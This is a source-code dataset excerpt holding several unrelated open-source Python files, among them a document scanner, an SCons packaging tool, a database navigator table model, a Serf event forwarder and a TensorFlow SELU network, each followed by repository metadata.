print colored('You have set COPY_GOOGLE_DOC_KEY to None. If you want to use a Google Sheet, set COPY_GOOGLE_DOC_KEY to the key of your sheet in app_config.py', 'blue')
return
credentials = get_credentials()
if not credentials:
print colored('No Google OAuth credentials file found.', 'yellow')
print colored('Run `fab app` and visit `http://localhost:8000` to generate credentials.', 'yellow')
return
get_document(app_config.COPY_GOOGLE_DOC_KEY, app_config.COPY_PATH)
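# Minimal usage sketch, assuming OAuth credentials were already generated via
# `fab app` and COPY_GOOGLE_DOC_KEY is set in app_config.py; typically invoked
# from the project root as something like:
#
#   fab text.update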
|
nprapps/books14
|
fabfile/text.py
|
Python
|
mit
| 878
|
#!/usr/bin/env python
__author__ = 'Aleksandar Gyorev'
__email__ = 'a.gyorev@jacobs-university.de'
import cv2
import numpy as np
import argparse
from transform import Transform
from basic_image import BasicImage
from combine_images import CombineImages
""" Arugment Parser """
ap = argparse.ArgumentParser()
ap.add_argument('-i',
'--image',
required = True,
help = 'path to the image')
ap.add_argument('-H',
'--height',
required = False,
default = 300,
                help = 'height of the resized image we will process and use for finding the contours (default: 300)')
ap.add_argument('-n',
'--noise',
required = False,
default = 0,
                help = 'the level to which we remove noise and smaller details from the scan (default: 0, i.e. preserve everything)')
ap.add_argument('-c',
'--closing',
required = False,
default = 3,
help = 'the size of the closing element after applying the Canny edge detector')
ap.add_argument('-a',
'--auto',
required = False,
action = 'store_true',
default = False,
help = 'if we want to have automatically set values for the height and closing when looking for objects')
ap.add_argument('-s',
'--save',
action = 'store_true',
default = False,
help = 'set the flag in order to save the extracted images to the current folder')
args = vars(ap.parse_args())
# Getting the user input
HEIGHT = int(args['height'])
NOISE_REMOVAL_LEVEL = max(int(args['noise']) * 2 - 1, 0)
CLOSING_SIZE = int(args['closing'])
bi = BasicImage(args['image'])
def scan():
""" Step 1: Edge Detection """
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # get the grayscale image
gray = cv2.bilateralFilter(gray, 11, 17, 17)
#gray = cv2.GaussianBlur(gray, (3, 3), 0) # with a bit of blurring
#BasicImage(gray).show()
    # automatic Canny edge detection threshold computation
high_thresh, thresh_im = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
low_thresh = high_thresh / 2.0
# zero-parameter automatic Canny edge detection (method 2)
# Vary the percentage thresholds that are determined (in practice 0.33 tends to give good approx. results)
# A lower value of sigma indicates a tighter threshold, whereas a larger value of sigma gives a wider threshold.
#sigma = 0.33
#v = np.median(gray)
#low_thresh = int(max(0, (1.0 - sigma) * v))
#high_thresh = int(min(255, (1.0 + sigma) * v))
edged = cv2.Canny(gray, low_thresh, high_thresh) # detect edges (outlines) of the objects
#BasicImage(edged).show()
# since some of the outlines are not exactly clear, we construct
# and apply a closing kernel to close the gaps b/w white pixels
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (CLOSING_SIZE, CLOSING_SIZE))
closed = cv2.morphologyEx(edged, cv2.MORPH_CLOSE, kernel)
#BasicImage(closed).show()
""" Step 2: Finding Contours """
(contours, _) = cv2.findContours(closed.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
total = 0
# looping over the contours found
approx_all = []
for contour in contours:
# approximating the contour
contour = cv2.convexHull(contour)
peri = cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(contour, 0.02 * peri, True)
area = cv2.contourArea(contour)
# we don't consider anything less than 5% of the whole image
if area < 0.05 * total_area:
continue
        # if the approximated contour has 4 points, then assume it is a book
# a book is a rectangle and thus it has 4 vertices
if len(approx) == 4:
cv2.drawContours(image, [approx], -1, (0, 255, 0), 4)
approx_all.append(approx)
total += 1
print 'Found %d books/papers in the image.' % total
#BasicImage(image).show()
# no point of displaying anything if we couldn't find any books
if total != 0:
""" Displaying all intermediate steps into one image """
top_row = CombineImages(300, original, gray)
bot_row = CombineImages(300, closed, image)
BasicImage(top_row).show()
BasicImage(bot_row).show()
#com_img = np.vstack((top_row, bot_row))
#BasicImage(com_img).show()
""" Step 3: Apply a Perspective Transform and Threshold """
total = 0
for approx in approx_all:
total += 1
warped = Transform.get_box_transform(original, approx.reshape(4, 2) * ratio)
#BasicImage(warped).show()
scan_warped = cv2.cvtColor(warped, cv2.COLOR_BGR2GRAY)
scan_warped = cv2.medianBlur(scan_warped, NOISE_REMOVAL_LEVEL)
scan_warped = cv2.adaptiveThreshold(scan_warped, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)
#BasicImage(scan_warped).show()
BasicImage(CombineImages(400, warped, scan_warped)).show()
# save the image
if args['save'] == True:
filename_color = 'scan%03d_color.jpg' % total
filename_scan = 'scan%03d_scan.jpg' % total
BasicImage(warped).save(filename_color)
BasicImage(scan_warped).save(filename_scan)
return total
if args['auto'] == False:
original = bi.get().copy()
ratio = original.shape[0] / float(HEIGHT)
image = bi.resize('H', HEIGHT)
total_area = image.shape[0] * image.shape[1]
#BasicImage(image).show()
scan()
else:
for auto_height in xrange(min(650, bi.get().shape[0]), 299, -50):
for auto_closing in xrange(6, 1, -1):
HEIGHT = auto_height
CLOSING_SIZE = auto_closing
original = bi.get().copy()
ratio = original.shape[0] / float(HEIGHT)
image = bi.resize('H', HEIGHT)
total_area = image.shape[0] * image.shape[1]
print 'auto_height = ', auto_height
print 'auto_closing= ', auto_closing
if scan() != 0:
exit(0)
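# Minimal command-line usage sketch (the image path is illustrative only):
#
#   python scan.py -i shelf.jpg                 # single pass with the defaults
#   python scan.py -i shelf.jpg --auto --save   # sweep height/closing values and
#                                               # save scanNNN_color / scanNNN_scan images
#
# The flags correspond to the argparse options above: -H height, -n noise,
# -c closing, -a auto, -s save.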
|
agyorev/DocuScan
|
scan.py
|
Python
|
gpl-2.0
| 6,159
|
##########################################################################
#
# Copyright (c) 2007-2010, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from IECore import *
import os
import os.path
class FileDependenciesOp( Op ) :
def __init__( self ) :
Op.__init__( self, "Lists the dependencies of a file.",
Parameter(
name = "result",
description = "A list of required files and file sequences.",
defaultValue = StringVectorData()
)
)
self.parameters().addParameters(
[
FileNameParameter(
name = "file",
description = "The file to list dependencies for.",
defaultValue = "",
check = DirNameParameter.CheckType.MustExist,
extensions = " ".join( FileExaminer.supportedExtensions() ),
allowEmptyString = False,
),
BoolParameter(
name = "recurse",
description = "When on, recursively searches the file dependency tree and lists all results.",
defaultValue = False,
),
StringParameter(
name = "resultType",
description = "The format of the result",
defaultValue = "string",
presets = (
( "string", "string" ),
( "stringVector", "stringVector" ),
),
presetsOnly = True,
)
]
)
def doOperation( self, operands ) :
files = set()
if operands["recurse"].value :
files = FileExaminer.allDependencies( operands["file"].value )
else :
files = FileExaminer.create( operands["file"].value ).dependencies()
if operands["resultType"].value == "string" :
return StringData( "\n".join( [str(s) for s in files] ) )
else :
return StringVectorData( [str(s) for s in files] )
registerRunTimeTyped( FileDependenciesOp )
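# Minimal usage sketch, assuming the usual IECore convention that an Op instance
# can be called with its parameter values as keyword arguments; the file path is
# illustrative only:
#
#   op = FileDependenciesOp()
#   deps = op( file="/path/to/shot.cob", recurse=True, resultType="stringVector" )
#   print list( deps )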
|
code-google-com/cortex-vfx
|
python/IECore/FileDependenciesOp.py
|
Python
|
bsd-3-clause
| 3,313
|
"""
cat
Package init file
"""
from _version import __version__
class Box(object):
"""
A class that adheres to the Heisenberg interpretation of
Quantum Mechanics.
Consider: an object is locked in a box.
The object is either a list or a set. It is entangled.
When we observe it in a way that is definitively set-like,
    say we ask for its intersection, we Open The Box.
At this point, it resolves itself into a set, and will remain a set
in perpetuity.
Why is this useful you ask?
Well if you have to ask, then you almost certainly won't find the
answer satisfying.
If on the other hand you're the kind of person who responds to this
with:
"*excellent* - I want to do That Sort Of Thing all the time"
then congratulations - now you can.
"""
def __new__(klass):
klass.__mro__ = klass.box
|
davidmiller/cat
|
cat/__init__.py
|
Python
|
apache-2.0
| 871
|
# -*- coding: utf-8 -*-
#
# Copyright © 2014 René Samselnig
#
# This file is part of Database Navigator.
#
# Database Navigator is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Database Navigator is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Database Navigator. If not, see <http://www.gnu.org/licenses/>.
#
import logging
from sqlalchemy.exc import ProgrammingError, DataError
from dbmanagr.logger import LogWith
from dbmanagr.querybuilder import QueryBuilder, SimplifyMapper
from dbmanagr.comment import create_comment
from dbmanagr.exception import UnknownColumnException
from dbmanagr.model.baseitem import BaseItem
from dbmanagr.model.column import create_column
from dbmanagr.model.row import Row
from dbmanagr.model import DEFAULT_LIMIT
OPTION_URI_VALUE_FORMAT = '%s%s/?%s'
logger = logging.getLogger(__name__)
class Table(BaseItem):
def __init__(
self,
entity=None,
uri=None,
owner=None,
size=None,
name=None,
primary_key=None,
columns=None):
self.name = None
if entity is not None:
self.name = entity.name
elif name is not None:
self.name = name
self._entity = entity
self.uri = uri
self.owner = owner
self.size = size
if entity is not None:
self._columns = map(
lambda c: create_column(self, str(c.name), c), entity.columns)
elif columns is not None:
self._columns = map(
lambda c: create_column(self, c), columns)
else:
self._columns = None
self._fks = {}
self.primary_key = primary_key
def __repr__(self):
return self.name
def autocomplete(self):
return self.autocomplete_()
def autocomplete_(
self, column=None, value=None, format_=OPTION_URI_VALUE_FORMAT):
"""Retrieves the autocomplete string for the given column and value"""
if column is None:
return u'%s%s?' % (self.uri, self.name)
tablename = self.name
if type(value) is buffer:
value = '[BLOB]'
else:
value = u'%s=%s' % (column, value)
return format_ % (self.uri, tablename, value)
def entity(self):
return self._entity
def columns(self, needle=None):
"""Retrieves columns of table with optional filter applied"""
if needle is None:
return self._columns
return filter(lambda c: needle in c.name, self._columns)
def column(self, name):
if type(name) is int:
return self._columns[name]
for col in self._columns:
if col.name == name:
return col
return None
@LogWith(logger, log_result=False, log_args=False)
def rows(
self,
connection,
filter_=None,
limit=DEFAULT_LIMIT,
simplify=None):
"""Retrieves rows from the table with the given filter applied"""
comment = None
order = []
if simplify is None:
simplify = False
if simplify:
comment = connection.comment(self.name)
order = comment.order
builder = QueryBuilder(
connection,
self,
filter_=filter_,
order=order,
limit=limit,
simplify=simplify)
mapper = None
if simplify:
mapper = SimplifyMapper(
self,
comment=create_comment(
self,
comment,
builder.counter,
builder.aliases,
None))
try:
result = connection.queryall(
builder.build(),
mapper=mapper)
except (DataError, ProgrammingError, UnknownColumnException,
UnicodeEncodeError): # pragma: no cover
raise
except BaseException as e: # pragma: no cover
logger.error(e, exc_info=1) # pragma: no cover
import sys # pragma: no cover
# pylint: disable=raising-non-exception
raise type(e), type(e)(
u'{} (check comment on table {})'.format(e.message, self.name)
), sys.exc_info()[2] # pragma: no cover
return map(lambda row: Row(self, row), result)
def foreign_keys(self):
return self._fks
def foreign_key(self, name):
if name in self._fks:
return self._fks[name]
return None
def set_foreign_key(self, name, value):
self._fks[name] = value
def title(self):
return self.name
def subtitle(self):
if self.owner and self.size:
return u'Owner: %s (%s)' % (self.owner, self.size)
return u'Table'
|
resamsel/dbmanagr
|
src/dbmanagr/model/table.py
|
Python
|
gpl-3.0
| 5,345
|
#!/usr/bin/python
import os
import socket
import logging
import sys
import requests
if __name__ == '__main__':
    my_ip = socket.gethostbyname(socket.gethostname())
    log_dir = '/tmp/logging/%s' % my_ip
    if not os.path.exists(log_dir):
        # create the per-host log directory up front so basicConfig can open the file
        os.makedirs(log_dir)
    logging.basicConfig(filename='%s/event_handler.log' % log_dir,
                        level=logging.DEBUG)
payload = sys.stdin.read()
try:
event = os.environ["SERF_USER_EVENT"]
except KeyError:
try:
event = os.environ["SERF_EVENT"]
except KeyError:
event = "NO_EVENT_FOUND"
logging.info("Sending %s %s " % (event, payload))
if len(payload) > 0:
r = requests.put("http://127.0.0.1:5000/send/%s" % event, data=payload)
else:
r = requests.put("http://127.0.0.1:5000/send/%s" % event, data="")
|
pinireznik/antitude
|
agents/ui/UIEventHandler.py
|
Python
|
apache-2.0
| 839
|
/usr/share/pyshared/gwibber/lib/gtk/widgets.py
|
Alberto-Beralix/Beralix
|
i386-squashfs-root/usr/lib/pymodules/python2.7/gwibber/lib/gtk/widgets.py
|
Python
|
gpl-3.0
| 46
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""This is task 3 its jelly time"""
from peanut import BUTTER
JELLY = BUTTER
|
mjmeyer2013/is210-week-05-warmup
|
task_03.py
|
Python
|
mpl-2.0
| 126
|
"""SCons.Tool.Packaging
SCons Packaging Tool.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/packaging/__init__.py 3842 2008/12/20 22:59:52 scons"
import SCons.Environment
from SCons.Variables import *
from SCons.Errors import *
from SCons.Util import is_List, make_path_relative
from SCons.Warnings import warn, Warning
import os, imp
import SCons.Defaults
__all__ = [ 'src_targz', 'src_tarbz2', 'src_zip', 'tarbz2', 'targz', 'zip', 'rpm', 'msi', 'ipk' ]
#
# Utility and Builder function
#
def Tag(env, target, source, *more_tags, **kw_tags):
""" Tag a file with the given arguments, just sets the accordingly named
attribute on the file object.
TODO: FIXME
"""
if not target:
target=source
first_tag=None
else:
first_tag=source
if first_tag:
kw_tags[first_tag[0]] = ''
if len(kw_tags) == 0 and len(more_tags) == 0:
raise UserError, "No tags given."
# XXX: sanity checks
for x in more_tags:
kw_tags[x] = ''
if not SCons.Util.is_List(target):
target=[target]
else:
        # sometimes the target list is a list of lists; make sure it is
        # flattened prior to processing.
        # TODO: perhaps a bug upstream?
target=env.Flatten(target)
for t in target:
for (k,v) in kw_tags.items():
# all file tags have to start with PACKAGING_, so we can later
# differentiate between "normal" object attributes and the
# packaging attributes. As the user should not be bothered with
# that, the prefix will be added here if missing.
#if not k.startswith('PACKAGING_'):
if k[:10] != 'PACKAGING_':
k='PACKAGING_'+k
setattr(t, k, v)
def Package(env, target=None, source=None, **kw):
""" Entry point for the package tool.
"""
# check if we need to find the source files ourself
if not source:
source = env.FindInstalledFiles()
if len(source)==0:
raise UserError, "No source for Package() given"
# decide which types of packages shall be built. Can be defined through
# four mechanisms: command line argument, keyword argument,
# environment argument and default selection( zip or tar.gz ) in that
# order.
try: kw['PACKAGETYPE']=env['PACKAGETYPE']
except KeyError: pass
if not kw.get('PACKAGETYPE'):
from SCons.Script import GetOption
kw['PACKAGETYPE'] = GetOption('package_type')
if kw['PACKAGETYPE'] == None:
if env['BUILDERS'].has_key('Tar'):
kw['PACKAGETYPE']='targz'
elif env['BUILDERS'].has_key('Zip'):
kw['PACKAGETYPE']='zip'
else:
raise UserError, "No type for Package() given"
PACKAGETYPE=kw['PACKAGETYPE']
if not is_List(PACKAGETYPE):
        PACKAGETYPE=PACKAGETYPE.split(',')
# load the needed packagers.
def load_packager(type):
try:
file,path,desc=imp.find_module(type, __path__)
return imp.load_module(type, file, path, desc)
except ImportError, e:
raise EnvironmentError("packager %s not available: %s"%(type,str(e)))
packagers=map(load_packager, PACKAGETYPE)
# set up targets and the PACKAGEROOT
try:
# fill up the target list with a default target name until the PACKAGETYPE
# list is of the same size as the target list.
if not target: target = []
size_diff = len(PACKAGETYPE)-len(target)
default_name = "%(NAME)s-%(VERSION)s"
if size_diff>0:
default_target = default_name%kw
target.extend( [default_target]*size_diff )
if not kw.has_key('PACKAGEROOT'):
kw['PACKAGEROOT'] = default_name%kw
except KeyError, e:
raise SCons.Errors.UserError( "Missing Packagetag '%s'"%e.args[0] )
# setup the source files
source=env.arg2nodes(source, env.fs.Entry)
# call the packager to setup the dependencies.
targets=[]
try:
for packager in packagers:
t=[target.pop(0)]
t=apply(packager.package, [env,t,source], kw)
targets.extend(t)
assert( len(target) == 0 )
except KeyError, e:
raise SCons.Errors.UserError( "Missing Packagetag '%s' for %s packager"\
% (e.args[0],packager.__name__) )
except TypeError, e:
# this exception means that a needed argument for the packager is
# missing. As our packagers get their "tags" as named function
# arguments we need to find out which one is missing.
from inspect import getargspec
args,varargs,varkw,defaults=getargspec(packager.package)
if defaults!=None:
args=args[:-len(defaults)] # throw away arguments with default values
map(args.remove, 'env target source'.split())
# now remove any args for which we have a value in kw.
#args=[x for x in args if not kw.has_key(x)]
args=filter(lambda x, kw=kw: not kw.has_key(x), args)
if len(args)==0:
raise # must be a different error, so reraise
elif len(args)==1:
raise SCons.Errors.UserError( "Missing Packagetag '%s' for %s packager"\
% (args[0],packager.__name__) )
else:
raise SCons.Errors.UserError( "Missing Packagetags '%s' for %s packager"\
% (", ".join(args),packager.__name__) )
target=env.arg2nodes(target, env.fs.Entry)
targets.extend(env.Alias( 'package', targets ))
return targets
#
# SCons tool initialization functions
#
added = None
def generate(env):
from SCons.Script import AddOption
global added
if not added:
added = 1
AddOption('--package-type',
dest='package_type',
default=None,
type="string",
action="store",
help='The type of package to create.')
try:
env['BUILDERS']['Package']
env['BUILDERS']['Tag']
except KeyError:
env['BUILDERS']['Package'] = Package
env['BUILDERS']['Tag'] = Tag
def exists(env):
return 1
# XXX
def options(opts):
opts.AddVariables(
EnumVariable( 'PACKAGETYPE',
'the type of package to create.',
None, allowed_values=map( str, __all__ ),
ignorecase=2
)
)
#
# Internal utility functions
#
def copy_attr(f1, f2):
""" copies the special packaging file attributes from f1 to f2.
"""
#pattrs = [x for x in dir(f1) if not hasattr(f2, x) and\
# x.startswith('PACKAGING_')]
copyit = lambda x, f2=f2: not hasattr(f2, x) and x[:10] == 'PACKAGING_'
pattrs = filter(copyit, dir(f1))
for attr in pattrs:
setattr(f2, attr, getattr(f1, attr))
def putintopackageroot(target, source, env, pkgroot, honor_install_location=1):
""" Uses the CopyAs builder to copy all source files to the directory given
in pkgroot.
If honor_install_location is set and the copied source file has an
PACKAGING_INSTALL_LOCATION attribute, the PACKAGING_INSTALL_LOCATION is
used as the new name of the source file under pkgroot.
    The source file will not be copied if it is already under the pkgroot
directory.
All attributes of the source file will be copied to the new file.
"""
# make sure the packageroot is a Dir object.
if SCons.Util.is_String(pkgroot): pkgroot=env.Dir(pkgroot)
if not SCons.Util.is_List(source): source=[source]
new_source = []
for file in source:
if SCons.Util.is_String(file): file = env.File(file)
if file.is_under(pkgroot):
new_source.append(file)
else:
if hasattr(file, 'PACKAGING_INSTALL_LOCATION') and\
honor_install_location:
new_name=make_path_relative(file.PACKAGING_INSTALL_LOCATION)
else:
new_name=make_path_relative(file.get_path())
new_file=pkgroot.File(new_name)
new_file=env.CopyAs(new_file, file)[0]
copy_attr(file, new_file)
new_source.append(new_file)
return (target, new_source)
def stripinstallbuilder(target, source, env):
""" strips the install builder action from the source list and stores
the final installation location as the "PACKAGING_INSTALL_LOCATION" of
the source of the source file. This effectively removes the final installed
files from the source list while remembering the installation location.
It also warns about files which have no install builder attached.
"""
def has_no_install_location(file):
return not (file.has_builder() and\
hasattr(file.builder, 'name') and\
(file.builder.name=="InstallBuilder" or\
file.builder.name=="InstallAsBuilder"))
if len(filter(has_no_install_location, source)):
warn(Warning, "there are files to package which have no\
InstallBuilder attached, this might lead to irreproducible packages")
n_source=[]
for s in source:
if has_no_install_location(s):
n_source.append(s)
else:
for ss in s.sources:
n_source.append(ss)
copy_attr(s, ss)
setattr(ss, 'PACKAGING_INSTALL_LOCATION', s.get_path())
return (target, n_source)
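# Minimal SConstruct sketch using the Package() entry point above; the project
# name, version and install path are illustrative assumptions:
#
#   env = Environment(tools=['default', 'packaging'])
#   prog = env.Install('/usr/bin', env.Program('hello.c'))
#   env.Package(NAME='hello',
#               VERSION='1.0',
#               PACKAGETYPE='targz',
#               source=prog)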
|
carlos-lopez-garces/mapnik-trunk
|
scons/scons-local-1.2.0/SCons/Tool/packaging/__init__.py
|
Python
|
lgpl-2.1
| 10,691
|
# -*- coding: utf-8 -*-
# (c) 2015 Oihane Crucelaegui - AvanzOSC
# License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html
from . import test_quality_control_stock
|
alhashash/odoomrp-wip
|
quality_control_stock/tests/__init__.py
|
Python
|
agpl-3.0
| 172
|
# coding: utf-8
# ## vanilla-DNN-ema
# Author: Justin Tan
#
# Vanilla neural network. Do anything from MNIST to signal classification.
#
# Update 20/03: Added batch normalization, TensorBoard visualization
#
# Update 19/06: Added cosine annealing, exponential moving average
#
# To-do: Update to TF 1.2, fused batch norm
# In[1]:
import tensorflow as tf
import numpy as np
import pandas as pd
import time, os
class config(object):
# Set network parameters
mode = 'kst'
channel = 'rho0'
n_features = 100
keep_prob = 0.8
num_epochs = 256
batch_size = 256
# n_layers = 3
# hidden_layer_nodes = [1024, 1024, 512]
n_layers = 12
hidden_layer_nodes = [1024, 1024, 1024, 1024, 512, 512, 512, 512, 256, 256, 256, 256]
ema_decay = 0.999
learning_rate = 8e-5
cycles = 8 # Number of annealing cycles
n_classes = 2
builder = 'selu'
class directories(object):
tensorboard = 'tensorboard'
checkpoints = 'checkpoints'
architecture = '{} - {} | Layers: {} | Dropout: {} | Base LR: {} | Epochs: {}'.format(
config.channel, config.mode, config.n_layers, config.keep_prob, config.learning_rate, config.num_epochs)
class reader():
# Iterates over data and returns batches
def __init__(self, df):
self.df = df
self.batch_size = config.batch_size
self.steps_per_epoch = len(df) // config.batch_size
self.epochs = 0
self.proceed = True
self.shuffle()
def shuffle(self):
self.df = self.df.sample(frac=1).reset_index(drop=True)
self.df_X = self.df.drop('labels', axis = 1)
self.df_y = self.df['labels']
self.pointer = 0
    def next_batch(self, batch_size):
        if self.pointer + 1 >= self.steps_per_epoch:
            # final (possibly partial) batch of the epoch: return the remainder,
            # then reshuffle and signal the end of the epoch
            inputs = self.df_X.iloc[self.pointer*batch_size:]
            targets = self.df_y.iloc[self.pointer*batch_size:]
            self.epochs += 1
            self.shuffle()
            self.proceed = False
            return inputs, targets
        inputs = self.df_X.iloc[self.pointer*batch_size:(self.pointer+1)*batch_size]
        targets = self.df_y.iloc[self.pointer*batch_size:(self.pointer+1)*batch_size]
        self.pointer += 1
        return inputs, targets
# ### Functions for graph construction
# In[2]:
# SELU helper functions
import numbers
from tensorflow.contrib import layers
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.layers import utils
""" When using SELUs you have to keep the following in mind:
# (1) scale inputs to zero mean and unit variance
# (2) use SELUs
# (3) initialize weights with stddev sqrt(1/n)
# (4) use SELU dropout
"""
# (1) scale inputs to zero mean and unit variance
# (2) use SELUs
def selu(x):
with ops.name_scope('elu') as scope:
alpha = 1.6732632423543772848170429916717
scale = 1.0507009873554804934193349852946
return scale*tf.where(x>=0.0, x, alpha*tf.nn.elu(x))
# (3) initialize weights with stddev sqrt(1/n)
SELU_initializer = layers.variance_scaling_initializer(factor=1.0, mode='FAN_IN')
# (4) use this dropout
def dropout_selu(x, rate, alpha= -1.7580993408473766, fixedPointMean=0.0, fixedPointVar=1.0,
noise_shape=None, seed=None, name=None, training=False):
"""Dropout to a value with rescaling."""
def dropout_selu_impl(x, rate, alpha, noise_shape, seed, name):
keep_prob = 1.0 - rate
x = ops.convert_to_tensor(x, name="x")
if isinstance(keep_prob, numbers.Real) and not 0 < keep_prob <= 1:
raise ValueError("keep_prob must be a scalar tensor or a float in the "
"range (0, 1], got %g" % keep_prob)
keep_prob = ops.convert_to_tensor(keep_prob, dtype=x.dtype, name="keep_prob")
keep_prob.get_shape().assert_is_compatible_with(tensor_shape.scalar())
alpha = ops.convert_to_tensor(alpha, dtype=x.dtype, name="alpha")
alpha.get_shape().assert_is_compatible_with(tensor_shape.scalar())
if tensor_util.constant_value(keep_prob) == 1:
return x
noise_shape = noise_shape if noise_shape is not None else array_ops.shape(x)
random_tensor = keep_prob
random_tensor += random_ops.random_uniform(noise_shape, seed=seed, dtype=x.dtype)
binary_tensor = math_ops.floor(random_tensor)
ret = x * binary_tensor + alpha * (1-binary_tensor)
a = math_ops.sqrt(fixedPointVar / (keep_prob *((1-keep_prob) * math_ops.pow(alpha-fixedPointMean,2) + fixedPointVar)))
b = fixedPointMean - a * (keep_prob * fixedPointMean + (1 - keep_prob) * alpha)
ret = a * ret + b
ret.set_shape(x.get_shape())
return ret
with ops.name_scope(name, "dropout", [x]) as name:
return utils.smart_cond(training,
lambda: dropout_selu_impl(x, rate, alpha, noise_shape, seed, name),
lambda: array_ops.identity(x))
# In[3]:
def load_data(file_name, test_size = 0.05):
from sklearn.model_selection import train_test_split
df = pd.read_hdf(file_name, 'df')
df_X_train, df_X_test, df_y_train, df_y_test = train_test_split(df.drop('labels', axis = 1),
df['labels'], test_size = test_size, random_state=42)
return df_X_train, df_X_test, df_y_train, df_y_test
def save_summary(config, delta_t, train_acc, test_acc, test_auc):
import json
summary = {
'Channel': config.channel,
'Mode': config.mode,
'Timestamp': time.strftime('%c'),
'Arch': config.builder,
'Layers': config.n_layers,
'Batch_size': config.batch_size,
'Dropout': config.keep_prob,
'Epochs': config.num_epochs,
'Time': delta_t,
'Final train acc': train_acc,
'Final test acc': test_acc,
'Final test AUC': test_auc
}
# Writing JSON data
if os.path.isfile('vdnn_summary.json'):
        with open('vdnn_summary.json', 'r+') as f:
new = json.load(f)
new.append(summary)
with open('vdnn_summary.json', 'w') as f:
json.dump(new, f, indent = 4)
else:
with open('vdnn_summary.json', 'w') as f:
json.dump([summary], f, indent = 4)
def layer_weights(shape, initializer = tf.contrib.layers.xavier_initializer()):
# Return weight tensor of given shape using Xavier initialization
W = tf.get_variable("weights", shape = shape, initializer=initializer)
return W
def layer_biases(shape, init_value = 0.0):
# Return bias tensor of given shape with small initialized constant value
b = tf.get_variable("biases", shape = shape, initializer = tf.constant_initializer(init_value))
return b
def hidden_layer_ops(x, shape, name, keep_prob, activation=tf.nn.relu):
# Add operations to graph to construct hidden layers
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape)
biases = layer_biases(shape = [shape[1]])
# Apply non-linearity. Default is ReLU
actv = activation(tf.matmul(x, weights) + biases)
layer_output = tf.nn.dropout(actv, keep_prob)
return layer_output
def hidden_SELU_ops(x, shape, name, keep_prob, phase = True):
# Add operations to graph to construct hidden layers
with tf.variable_scope(name) as scope:
# scope.reuse_variables() # otherwise tf.get_variable() checks that already existing vars are not shared by accident
weights = layer_weights(shape = shape, initializer = SELU_initializer)
biases = layer_biases(shape = [shape[1]])
        # Apply the SELU non-linearity
actv = selu(tf.add(tf.matmul(x, weights), biases))
layer_output = dropout_selu(actv, rate = 1 - keep_prob, training = phase)
return layer_output
def build_SELU_network2(x, n_layers, hidden_layer_nodes, keep_prob, training_phase):
shape = [config.n_features, 1024]
name = 'w1'
with tf.variable_scope(name) as scope:
w1 = layer_weights(shape = shape, initializer = SELU_initializer)
b1 = layer_biases(shape = [shape[1]])
        # Apply the SELU non-linearity
a1 = selu(tf.add(tf.matmul(x, w1), b1))
